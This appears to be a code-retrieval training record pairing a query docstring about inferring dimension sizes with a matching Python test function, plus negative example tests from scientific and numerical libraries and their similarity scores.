[[-1,-1,0,-9,-2,-2],[-2,-1,-6,-8,-2,-5],[-1,-1,-1,-2,-3,-4],[-1,-9,-2,-4,-4,-5],[-7,-3,-3,-2,-9,-9],[-1,-3,-1,-2,-4,-5]]\n self.assertEqual(array_func(slot),-6)", "def test_call(self):\r\n # A lot of the returned numbers are based on random permutations and\r\n # thus cannot be tested for exact values. We'll test what we can\r\n # exactly, and then test for \"sane\" values for the \"random\" values. The\r\n # matplotlib Figure object cannot be easily tested either, so we'll try\r\n # our best to make sure it appears sane.\r\n obs = self.mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [0.5757052546507142, 0.60590471266814283,\r\n 0.63610417068557146, 0.66630362870299997, 0.69650308672042849,\r\n 0.72670254473785723, 0.75690200275528574]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [12, 6, 8, 10, 12, 16, 8]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.73244729118260765, 0.31157641757444593,\r\n 0.17627427296718071, None, None, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [0.57, 0.58, 0.59, 0.6,\r\n 0.61, 0.62, 0.63, 0.64, 0.65])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.1, 0.2, 0.3, 0.4, 0.5,\r\n 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 7)\r\n self.assertEqual(p_vals[3:], [None, None, None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[1] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[2] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals,\r\n [p_val * 3 if p_val is not None else None for p_val in p_vals])\r\n\r\n if (p_vals[0] >= 0 and p_vals[0] <= 0.01 and p_vals[1] > 0.01 and\r\n p_vals[1] <= 0.1 and p_vals[2] > 0.1 and p_vals[2] <= 0.5):\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_call_small(self):\r\n # The expected output was verified with vegan's mantel correlogram\r\n # function.\r\n obs = self.small_mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [3.0, 5.0, 7.0]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [2, 2, 2]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.86602540378443871, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [2.85, 2.9, 2.95, 3., 3.05,\r\n 3.1, 3.15, 3.2])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.82, 0.83, 0.84, 0.85,\r\n 0.86, 0.87, 0.88, 0.89, 0.9, 0.91])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.small_mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 3)\r\n self.assertEqual(p_vals[1:], [None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals, p_vals)\r\n\r\n if p_vals[0] >= 0 and p_vals[0] <= 0.5:\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_data_norange(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n lensumrange = random.randint(1, 10)\n\n ex.nreps = nreps\n ex.sumrange = [\"j\", range(lensumrange)]\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"Y\"][\"with\"].add(\"j\")\n ex.vary[\"Y\"][\"along\"] = 0\n ex.vary[\"Z\"][\"with\"].update([\"rep\", \"j\"])\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], cmds)\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", idx * m * n, \"X_%d\" % idx], cmds)\n\n self.assertIn([\n \"dmalloc\", \"Y\", lensumrange * m * m + (lensumrange - 1) * m\n ], cmds)\n idx = random.randint(0, lensumrange - 1)\n self.assertIn([\"doffset\", \"Y\", idx * m, \"Y_%d\" % idx], cmds)\n\n self.assertIn([\"cmalloc\", \"Z\", nreps * lensumrange * n * n], cmds)\n idxrep = random.randint(0, nreps - 1)\n idxrange = random.randint(0, lensumrange - 1)\n self.assertIn([\"coffset\", \"Z\",\n (idxrep * lensumrange + idxrange) * n * n,\n \"Z_%d_%d\" % (idxrep, idxrange)], cmds)", "def test_array_cache(self):\n cache = array_handler.ArrayCache()\n # Test if len works.\n self.assertEqual(len(cache), 0)\n arr = numpy.zeros(100, float)\n varr = vtk.vtkFloatArray()\n # test contains\n self.assertEqual(varr not in cache, True)\n cache.add(varr, arr)\n self.assertEqual(len(cache), 1)\n self.assertEqual(varr in cache, True)\n \n # Test the get method.\n self.assertEqual(cache.get(varr) is arr, True)\n\n # Test if the cache is cleared when the array is deleted.\n del varr\n self.assertEqual(len(cache), 0)" ]
[ "0.6313198", "0.6234536", "0.61531353", "0.60441715", "0.5897211", "0.58689487", "0.5791092", "0.5729955", "0.5682435", "0.5682435", "0.5633471", "0.55964816", "0.55935395", "0.5578403", "0.5577986", "0.5554115", "0.5551436", "0.555043", "0.554579", "0.5534603", "0.55257624", "0.55253726", "0.55050606", "0.55000937", "0.5488189", "0.54770494", "0.54725534", "0.5459195", "0.5446116", "0.54443127", "0.5419334", "0.5417154", "0.54116315", "0.53868574", "0.53700703", "0.5359558", "0.5358397", "0.5354476", "0.5353809", "0.53478897", "0.5347381", "0.5346172", "0.5346172", "0.5344917", "0.53375465", "0.53370756", "0.5328904", "0.53223383", "0.5320577", "0.5316061", "0.5315716", "0.5315716", "0.5311333", "0.5308855", "0.5307276", "0.5305906", "0.53037757", "0.52925736", "0.5292477", "0.52899444", "0.52819824", "0.527819", "0.52780366", "0.5277204", "0.52747935", "0.5269721", "0.5267073", "0.5259632", "0.5254121", "0.525395", "0.52465135", "0.5239102", "0.5216191", "0.5214265", "0.5203219", "0.519933", "0.51976174", "0.5194959", "0.51942396", "0.517296", "0.51726556", "0.5169713", "0.51665485", "0.5165983", "0.51629454", "0.5162594", "0.51617134", "0.5161357", "0.51592565", "0.515786", "0.5155635", "0.51506436", "0.5146733", "0.5142081", "0.5140946", "0.51401377", "0.5138945", "0.513788", "0.51335347", "0.51304436" ]
0.6475489
0
Test that the dimension sizes are being inferred correctly
def test_dimension_size_infer(self, nt=100): i, j, k = dimify('i j k') shape = tuple([d.size for d in [i, j, k]]) a = DenseData(name='a', shape=shape).indexed b = TimeData(name='b', shape=shape, save=True, time_dim=nt).indexed eqn = Eq(b[time, x, y, z], a[x, y, z]) op = Operator(eqn) _, op_dim_sizes = op.arguments() assert(op_dim_sizes[time.name] == nt)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_size_check(self):\n [x1, y1, s1, g1] = self.data.diffusion_data.shape\n [x2, y2, s2, g2] = module_05.run_module(self.data).diffusion_data.shape\n self.assertEqual(x1, x2)\n self.assertEqual(y1, y2)\n self.assertEqual(s1, s2)\n self.assertEqual(g1, g2)", "def dimension_check():\n print(\"### DIMENSION CHECK ###\")\n print(X.shape,\n y.shape,\n X_train.shape,\n y_train.shape,\n X_test.shape,\n y_test.shape,\n weights.shape)\n print(\"### END ###\")", "def test_dimensions(self):\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe(layers=[self.first_layer])\n\t\tprint(details)\n\t\tN = details.N.to_numpy()[0]\n\t\tM = details.M.to_numpy()[0]\n\t\trf = details.rf.to_numpy()[0]\n\t\tnum_evals = details.num_evals.to_numpy()[0]\n\t\tprint(N,M,rf,num_evals)\n\t\t\n\t\tself.assertEqual(N,64)\n\t\tself.assertEqual(M,3)\n\t\tself.assertEqual(rf,9)\n\t\tself.assertEqual(num_evals,M*rf)", "def dimensions():", "def _autocheck_dimensions(self):\n # W dimensions check list\n assert len(self.W.shape) == 2, f\"W shape should be (N, N) but is {self.W.shape}.\"\n assert self.W.shape[0] == self.W.shape[1], f\"W shape should be (N, N) but is {self.W.shape}.\"\n\n # Win dimensions check list\n assert len(self.Win.shape) == 2, f\"Win shape should be (N, input) but is {self.Win.shape}.\"\n err = f\"Win shape should be ({self.W.shape[1]}, input) but is {self.Win.shape}.\"\n assert self.Win.shape[0] == self.W.shape[0], err\n\n # Wout dimensions check list\n assert len(self.Wout.shape) == 2, f\"Wout shape should be (output, nb_states) but is {self.Wout.shape}.\"\n nb_states = self.Win.shape[1] + self.W.shape[0] + 1 if self.use_raw_inp else self.W.shape[0] + 1\n err = f\"Wout shape should be (output, {nb_states}) but is {self.Wout.shape}.\"\n assert self.Wout.shape[1] == nb_states, err\n\n # Wfb dimensions check list\n if self.Wfb is not None:\n assert len(self.Wfb.shape) == 2, f\"Wfb shape should be (input, output) but is {self.Wfb.shape}.\"\n err = f\"Wfb shape should be ({self.Win.shape[0]}, {self.Wout.shape[0]}) but is {self.Wfb.shape}.\"\n assert (self.Win.shape[0],self.Wout.shape[0]) == self.Wfb.shape, err", "def test_reduce_dimensionality(base_bertopic, embeddings, shape):\n umap_embeddings = base_bertopic._reduce_dimensionality(embeddings)\n assert umap_embeddings.shape == (shape, 5)", "def test_reduce_dimensionality(embeddings, shape):\n model = BERTopic()\n umap_embeddings = model._reduce_dimensionality(embeddings)\n assert umap_embeddings.shape == (shape, 5)", "def getDimensions():", "def test_batch_size_pack_size():", "def _check_sizes(self, space):\n my_dimension = self.get_total_dimension()\n other_dimension = space.get_total_dimension()\n if my_dimension != other_dimension:\n if isinstance(space, Conv2DSpace):\n if my_dimension * space.shape[0] !=\\\n other_dimension:\n raise ValueError(str(self)+\" with total dimension \" +\n str(my_dimension) +\n \" can't format a batch into \" +\n str(space) + \"because its total dimension\\\n is \" +\n str(other_dimension))", "def dimension(self):", "def _check_dimensions(self, workspace_to_check):\n for i in range(self._raw_ws.getNumDims()):\n if self._raw_ws.getDimension(i).getNBins() != workspace_to_check._raw_ws.getDimension(i).getNBins():\n return False\n return True", "def check_dimensions(d_real, d_fake, d_real_logits, d_fake_logits):\n def _check_pair(a, b):\n if a != b:\n raise ValueError(\"Shape mismatch: %s vs %s.\" % (a, b))\n if len(a) != 2 or len(b) != 2:\n raise ValueError(\"Rank: expected 2, got %s and %s\" % (len(a), len(b)))\n\n if (d_real is not None) and (d_fake is not None):\n _check_pair(d_real.shape.as_list(), d_fake.shape.as_list())\n if (d_real_logits is not None) and (d_fake_logits is not None):\n _check_pair(d_real_logits.shape.as_list(), d_fake_logits.shape.as_list())\n if (d_real is not None) and (d_real_logits is not None):\n _check_pair(d_real.shape.as_list(), d_real_logits.shape.as_list())", "def test_n_dim(self):\n with Pandas() as pd:\n if pd is None:\n return\n with Numpy() as np: # noqa\n if numpy is None:\n return\n sys.stderr.write(\"\\n\")\n\n df, hist1, hist2, hist3 = get_test_histograms1()\n hist0 = hg.Count()\n\n assert hist0.n_dim == 0\n assert hist1.n_dim == 1\n assert hist2.n_dim == 2\n assert hist3.n_dim == 3", "def valid_ndim_assertion(expected_dimentions, actual_dimention, name):\n\tassert (actual_dimention in expected_dimentions), \"Invalid ndim of {} should be {}\".format(name, str(expected_dimentions))", "def test_point_within_dimensions_invalid_sizes():\n point = np.array([20, 20, 20])\n image_dimensions = np.array([100, 100])\n\n with pytest.raises(AssertionError):\n assert not point_within_dimensions(point, image_dimensions)\n\n point = np.array([20, 20])\n image_dimensions = np.array([100, 100, 100])\n\n with pytest.raises(AssertionError):\n assert not point_within_dimensions(point, image_dimensions)", "def _validate_dimensions(config):\n logging.info(\"Checking provided dimensions are valid\")\n for feature in config.get(\"test-suites\").values():\n for test_name, test in feature.items():\n for dimensions_config in test[\"dimensions\"]:\n _validate_schedulers(config, dimensions_config.get(\"schedulers\", []))\n if [] in dimensions_config.values():\n logging.error(\"Values assigned to dimensions in test %s cannot be empty\", test_name)\n raise AssertionError", "def _automatic_dims(cls, dims, size):\n if dims is None:\n dims = size\n elif np.product(dims) != size:\n raise QiskitError(\"dimensions do not match size.\")\n if isinstance(dims, (int, np.integer)):\n num_qubits = int(np.log2(dims))\n if 2 ** num_qubits == size:\n return num_qubits * (2,)\n return (dims,)\n return tuple(dims)", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_vector_dimensions(self):\r\n # crear una lista 1-D (Horizontal, Entradas). \r\n Z = [1, 2, 3, 4, 5]\r\n # crear una lista 1-D (Vertical, Pesos de la red).\r\n W = [10, 20, 30]\r\n # Notemos que las dimensiones de Z y W son diferentes.\r\n try:\r\n neuron = rhonn(W, Z)\r\n except ValueError as e:\r\n # Comprobamos que efectivamente hay un error en las dimensiones.\r\n self.assertEqual(type(e), ValueError)\r\n else:\r\n self.fail('El error no fue lanzado.')", "def test_ncols_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[2], 235)", "def _test_obssize(t):\n return t.shape[0] != len(t.ids(axis='observation'))", "def _assert_same_size(outputs: TensorStruct, output_size: OutputSize):\n flat_output_size = nest.flatten(output_size)\n flat_output = nest.flatten(outputs)\n for output, size in zip(flat_output, flat_output_size):\n if isinstance(size, torch.Size):\n if output[0].size() != size:\n raise ValueError('The output size does not matchthe required output_size')\n elif output[0].size()[-1] != size:\n raise ValueError('The output size does not match the required output_size')", "def test_ban_size_kwarg(self):\n with pytest.raises(ValueError):\n Dimension(\"yolo\", \"norm\", 0.9, size=(3, 2))", "def testQuestionThree(self):\n self.assertEqual(AnswerQuestionThree().shape, (10,), \"Question three's output is not one dimension.\") \n self.assertEqual(AnswerQuestionThree().size, 10, \"Question three's output is not 10 long.\")", "def test_get_dim(self):\n self.assertEqual(self.game.get_dim(), self.game._dim)", "def check_qim_dim_match(cls, qim, dim):\n return len(qim) == len(dim)", "def _check_dimensions(self) -> None:\n dims = (self.y_dim, self.x_dim)\n da = self._obj[self.vars[0]] if isinstance(self._obj, xr.Dataset) else self._obj\n extra_dims = [dim for dim in da.dims if dim not in dims]\n if len(extra_dims) == 1:\n dims = tuple(extra_dims) + dims\n self.set_attrs(dim0=extra_dims[0])\n elif len(extra_dims) == 0:\n self._obj.coords[GEO_MAP_COORD].attrs.pop(\"dim0\", None)\n elif len(extra_dims) > 1:\n raise ValueError(\"Only 2D and 3D data arrays supported.\")\n if isinstance(self._obj, xr.Dataset):\n check = np.all([self._obj[name].dims == dims for name in self.vars])\n else:\n check = self._obj.dims == dims\n if check == False:\n raise ValueError(\n f\"Invalid dimension order ({da.dims}). \"\n f\"You can use `obj.transpose({dims}) to reorder your dimensions.\"\n )", "def _assert_same_size(outputs, output_size):\n nest.assert_same_structure(outputs, output_size)\n flat_output_size = nest.flatten(output_size)\n flat_output = nest.flatten(outputs)\n\n for (output, size) in zip(flat_output, flat_output_size):\n if isinstance(size, tf.TensorShape):\n if output.shape == size:\n pass\n elif output[0].shape != tf.TensorShape(size):\n raise ValueError(\n \"The output size does not match the the required output_size\")", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def test_dim_empty_list(a, b, metrics):\n if metrics in correlation_metrics:\n metric, _metric = metrics\n with pytest.raises(ValueError) as excinfo:\n metric(a, b, dim=[])\n assert \"requires `dim` not being empty, found dim\" in str(excinfo.value)\n elif metrics in distance_metrics:\n metric, _metric = metrics\n res = metric(a, b, dim=[])\n assert len(res.dims) == len(a.dims), print(res.dims)", "def test_dimensions_vector_space(self):\n\n v = Vector()\n self.assertEqual(VectorSpace, type(v.dimensions))", "def test_load_return_shape(size):\n X_train, X_test, y_train, y_test = src.load(train_size=size)\n num_samples = 1797\n assert X_train.shape == (int(num_samples * size), 64)\n assert X_test.shape == (int(num_samples * (1 - size)) + 1, 64)", "def test_dimension_size_override(self, nt=100):\n i, j, k = dimify('i j k')\n a = TimeData(name='a', dimensions=(i, j, k))\n one = symbol(name='one', dimensions=(i, j, k), value=1.)\n op = Operator(Eq(a.forward, a + one))\n\n # Test dimension override via the buffered dimenions\n a.data[0] = 0.\n op(a=a, t=6)\n assert(np.allclose(a.data[1], 5.))\n\n # Test dimension override via the parent dimenions\n a.data[0] = 0.\n op(a=a, time=5)\n assert(np.allclose(a.data[0], 4.))", "def check_resize_size(size):\n if isinstance(size, int):\n check_value(size, (1, FLOAT_MAX_INTEGER))\n elif isinstance(size, (tuple, list)) and len(size) == 2:\n for i, value in enumerate(size):\n check_value(value, (1, INT32_MAX), \"size at dim {0}\".format(i))\n else:\n raise TypeError(\"Size should be a single integer or a list/tuple (h, w) of length 2.\")", "def test_embedder_dimensions(self, setup_bert_embedder):\n bert_embedder, lines = setup_bert_embedder\n encoding = bert_embedder(lines)\n lens = [len(line.tokens[\"tokens\"]) for line in lines]\n max_word_len = max(lens)\n assert encoding.size(0) == 2\n assert encoding.size(2) == bert_embedder.get_embedding_dimension()\n assert encoding.size(1) == max_word_len", "def testQuestionTwo(self):\n self.assertEqual(AnswerQuestionTwo().shape, (5,5), \"Question two's output is not one dimension.\")", "def test_valid_sizes(self):\n for size in settings.MISAGO_AVATARS_SIZES:\n self.assertEqual(clean_size(size), size)", "def test_ncols_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[2], 235)", "def testscftargetdim(self):\r\n dim_scftargets = self.data.scftargets.shape\r\n dim_scfvalues = (len(self.data.scfvalues),len(self.data.scfvalues[0][0]))\r\n assert dim_scftargets == dim_scfvalues", "def dim(self) -> int:", "def count_dims(da):\n return len(da.dims)", "def check_dimensions(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim):\n\tassert 4 <= len(X.dims) <= 5, 'XCast requires a dataset to be 4-Dimensional'\n\tassert x_lat_dim in X.dims, 'XCast requires a dataset_lat_dim to be a dimension on X'\n\tassert x_lon_dim in X.dims, 'XCast requires a dataset_lon_dim to be a dimension on X'\n\tassert x_sample_dim in X.dims, 'XCast requires a dataset_sample_dim to be a dimension on X'\n\tassert x_feature_dim in X.dims, 'XCast requires a dataset_feature_dim to be a dimension on X'", "def check_size(self,x,y):\n assert(x <= 10**3), 'Width larger than 1000' \n assert(y <= 10**3), 'Height larger than 1000' \n assert(x*y <= 3*(10**5)), 'Resolution larger than 300000'", "def test_upcast_dims(self):\n self.init()\n # Test sum\n assert sum_mat(self.i64_1) == np.sum(self.i64_1)\n assert sum_cube(self.f64_1) == np.sum(self.f64_1)\n assert sum_cube(self.fi64_2) == np.sum(self.fi64_2)\n # Test transpose\n assert self.i64_1.shape == (3,)\n assert transpose_mat(self.i64_1).shape == (1,3)\n assert np.all(transpose_mat(self.i64_1) == self.i64_1.T)\n # Test that downcasting is not possible\n with pytest.raises(TypeError):\n transpose_mat(self.i64_3)\n with pytest.raises(TypeError):\n sum_vec(self.ff64_2)", "def __DimSiz_restriction_correct_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_slice_other_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)+shape[1:]", "def test_correct_image_size(location):\n chunkloc = resave_to_chunks(root=location[\"dir\"],\n n_imgs=10,\n output_stem=location[\"stem\"])\n\n loaded = np.load(chunkloc)\n assert len(loaded.files) > 0\n\n first = loaded[loaded.files[0]]\n assert first.shape != ()\n assert first.shape == (520, 696)", "def test_shape(self, varname, varshape, ndim): \n if len(varshape) != ndim:\n raise ShapeError('Shape=%s. Expected %i-D array for %s' %\n (repr(varshape), ndim, varname))", "def testFunction(self, input_shape, stride, kernel_shape, padding,\n output_shape):\n self.assertEqual(conv._default_transpose_size(input_shape, stride,\n kernel_shape=kernel_shape,\n padding=padding),\n tuple(output_shape))", "def test_check_X_too_many_dims():\n with pytest.raises(ValueError):\n check_X(np.ones((5,4,3)))", "def test_basic_cardinality(self):\n dim = Real(\"yolo\", \"reciprocal\", 0.043, 2.3, precision=2)\n order_0012 = np.arange(43, 99 + 1)\n order_010 = np.arange(10, 99 + 1)\n order_23 = np.arange(10, 23 + 1)\n assert dim.cardinality == sum(map(len, [order_0012, order_010, order_23]))", "def size(self):\n\t\treturn self.dims", "def test_validate_ndim():\n with pytest.raises(ValueError):\n validate_ndim(0)\n with pytest.raises(ValueError):\n validate_ndim(-1)\n with pytest.raises(ValueError):\n validate_ndim(0.5)\n\n assert validate_ndim(1) == 1\n assert validate_ndim(2) == 2", "def test_size_returns_length(dq_3):\n assert dq_3.size() == 3", "def check_dim(gr, DIM):\n l = len(gr)\n if(l != DIM):\n return False\n\n for i in range(0, DIM):\n if(len(gr[i]) != l):\n return False \n return True", "def __DimSiz_restriction_correct_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (2) [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_table_sizes(self):\n labels_tables = self.labels.find_one({ 'dataset': 'SF1' })['tables']\n\n for label_data in labels_tables.values():\n self.assertEqual(label_data['size'], len(label_data['labels']))", "def test_infer_target_shape(self):\n t = Quantize()\n assert t.infer_target_shape((5,)) == (5,)", "def required_input_dim(space: gym.Space, **kwargs) -> int:", "def get_dimension_length(self):\n pass", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? here / in varset?", "def test_embedding_matrix_shape(self):\n num_embeddings = 10\n features = 5\n embed = layers.Embed(num_embeddings=num_embeddings, features=features)\n inputs = np.expand_dims(np.arange(features, dtype=np.int64), 1)\n variables = embed.init(jax.random.PRNGKey(0), inputs)\n embedding_matrix = variables['params']['embedding']\n self.assertEqual((num_embeddings, features), embedding_matrix.shape)", "def testSimOuptputDimensions(self):\n self.tree.set_database(self.coal)\n sim_params = self.tree.get_simulation_parameters()\n self.assertEqual(sim_params[\"fine_map_x\"], 24)\n self.assertEqual(sim_params[\"fine_map_y\"], 24)\n self.assertEqual(sim_params[\"fine_map_x_offset\"], 0)\n self.assertEqual(sim_params[\"fine_map_y_offset\"], 0)\n self.assertEqual(sim_params[\"sim_complete\"], 1)", "def desiredDimensions(self):\n return None", "def test_gameboard_size(self):\n self.assertEqual(self.gameBoard.get_size(), (100, 100))\n self.assertEqual(self.gameBoard.get_columns(), 100)\n self.assertEqual(self.gameBoard.get_rows(), 100)", "def _check_shape(placeholder_shape, data_shape):\n\n return True", "def _test_obsmdsize(t):\n md = t.metadata(axis='observation')\n return t.shape[0] != len(md) if md is not None else False", "def test_resize3d():\n\n # Check resize3d for images with different size and without channel nor batch - Pass\n input_shape = (1, 3, 5)\n output_shape = (2, 4, 6)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and without channel - Pass\n input_shape = (1, 1, 3, 5)\n output_shape = (1, 2, 4, 6)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and with one channel - Pass\n input_shape = (1, 1, 3, 5, 1)\n output_shape = (1, 2, 4, 6, 1)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and with multiple channels - Pass\n input_shape = (1, 1, 3, 5, 3)\n output_shape = (1, 2, 4, 6, 3)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and without channel nor batch - Pass\n input_shape = (1, 3, 5)\n output_shape = (1, 3, 5)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and without channel - Pass\n input_shape = (1, 1, 3, 5)\n output_shape = (1, 1, 3, 5)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and with one channel - Pass\n input_shape = (1, 1, 3, 5, 1)\n output_shape = (1, 1, 3, 5, 1)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and with multiple channels - Pass\n input_shape = (1, 1, 3, 5, 3)\n output_shape = (1, 1, 3, 5, 3)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for proper image dimensions - Fail\n input_shape = (1, 1)\n size = (1, 1, 1)\n with pytest.raises(ValueError) as execinfo:\n layer_util.resize3d(image=tf.ones(input_shape), size=size)\n msg = \" \".join(execinfo.value.args[0].split())\n assert \"resize3d takes input image of dimension 3 or 4 or 5\" in msg\n\n # Check resize3d for proper size - Fail\n input_shape = (1, 1, 1)\n size = (1, 1)\n with pytest.raises(ValueError) as execinfo:\n layer_util.resize3d(image=tf.ones(input_shape), size=size)\n msg = \" \".join(execinfo.value.args[0].split())\n assert \"resize3d takes size of type tuple/list and of length 3\" in msg", "def has_dims(xobj, dims, kind):\n if isinstance(dims, str):\n dims = [dims]\n\n if not all(dim in xobj.dims for dim in dims):\n raise DimensionError(\n f'Your {kind} object must contain the '\n f'following dimensions at the minimum: {dims}'\n )\n return True", "def dims(x):\n return len(x.shape)", "def _test_sampmdsize(t):\n md = t.metadata(axis='sample')\n return t.shape[1] != len(md) if md is not None else False", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def ndims(x):\n return len(x.get_shape())", "def test_test_image_dims_content(self):\n iterator = self._dataset.get_test()\n sample = 